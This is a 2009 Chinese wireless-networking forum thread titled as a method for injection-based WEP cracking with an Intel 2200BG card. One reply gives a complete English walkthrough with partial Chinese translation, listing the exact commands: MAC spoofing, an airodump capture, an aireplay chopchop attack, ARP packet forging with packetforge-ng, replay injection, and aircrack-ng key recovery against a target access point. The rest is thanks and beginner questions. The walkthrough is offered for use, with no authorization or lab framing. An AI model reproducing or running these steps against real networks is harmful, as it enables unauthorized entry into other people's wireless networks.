ubnt解决方案
楼主: liyg

INTEL 2200bg实现注入式破解无客户端wep

[复制链接]

3

回帖

3

积分

0 小时

在线时间

预备兵

注册时间
2009-3-20
金币
0 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-20 19:03 |显示全部楼层
学习中......
回复

使用道具 举报

85

回帖

161

积分

38 小时

在线时间

上等兵

注册时间
2009-3-18
金币
71 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-20 20:20 |显示全部楼层
学习了,谢谢楼主!
回复

使用道具 举报

46

回帖

72

积分

19 小时

在线时间

新兵上阵

注册时间
2009-3-17
金币
23 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-21 22:32 |显示全部楼层
好深奥        看不懂
回复

使用道具 举报

23

回帖

38

积分

20 小时

在线时间

新兵上阵

注册时间
2008-10-17
金币
9 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-22 01:02 |显示全部楼层
We will also need to know the target's name (ESSID), MAC address, and the channel. 我们也需要知道目标的名称(ESSID也就是无线路由发出的广播名字),网卡的地址,以及频道.Please note that my wireless device is "eth1" but yours may be different; 请注意我的无线设备的端口名称是ETH1,但是你的可能不同.use "iwconfig" to find out which adaptor is wireless. 用IWCONFIG 去找出哪个是你的无线网卡(If you downloaded aircrack-ng you may need to reset your network adaptor)如果 你下载了AIRCRACK-NG ,你可能需要重新设置你的网卡.
iwlist eth1 scan
Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.现在我们能开始了,第一步,我们必须激活RTAP0到监听状态,RTAP0在 IPW2000设备中的限制,RTAP0是必须的(提到刚才说的ETH1)
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55
Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed
Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0
Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1
A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "replay_dec-######.xor"
Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.
Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.没时间了,先翻译前面部分.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request
Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1
Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap
谁把关键部分翻页一下,谢谢本文地址:http://forum.anywlan.com/thread-9561-1-1.html
回复

使用道具 举报

8

回帖

60

积分

5 小时

在线时间

上等兵

注册时间
2009-3-22
金币
36 个
威望
2 个
荣誉
0 个

尚未签到

发表于 2009-3-22 17:01 |显示全部楼层
can i help you?
回复

使用道具 举报

12

回帖

22

积分

6 小时

在线时间

新兵上阵

注册时间
2009-3-21
金币
8 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-22 17:35 |显示全部楼层
貌似非常简明扼要,有没有更详细点的?
回复

使用道具 举报

192

回帖

231

积分

70 小时

在线时间

少尉

注册时间
2009-2-8
金币
18 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-22 23:04 |显示全部楼层
我太需要这个了!真是感学啊!
回复

使用道具 举报

2

回帖

9

积分

6 小时

在线时间

预备兵

注册时间
2009-3-15
金币
6 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-23 15:24 |显示全部楼层
学习!!!!!!!!!!!!!
回复

使用道具 举报

37

回帖

476

积分

149 小时

在线时间

少尉

注册时间
2008-1-16
金币
424 个
威望
0 个
荣誉
0 个
累计签到:10 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-3-23 16:59 |显示全部楼层
楼主运气好,破解的AP  Data就有8个了,要是Data一直为0  就是-4 -5 都无法抓包的,我是新手,不知这样理解是不是对的,见谅。
回复

使用道具 举报

93

回帖

127

积分

48 小时

在线时间

上等兵

注册时间
2009-3-22
金币
24 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-3-23 22:46 |显示全部楼层
hao !!就需要这个
回复

使用道具 举报

6

回帖

11

积分

1 小时

在线时间

新兵上阵

注册时间
2009-3-16
金币
5 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-24 14:04 |显示全部楼层
学习学习。。。。。。
回复

使用道具 举报

36

回帖

71

积分

6 小时

在线时间

新兵上阵

注册时间
2009-3-20
金币
34 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-25 00:26 |显示全部楼层
我的是2915a/b/g,就是无法注入,用你的办法试试
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-7-14 20:50

返回顶部 返回列表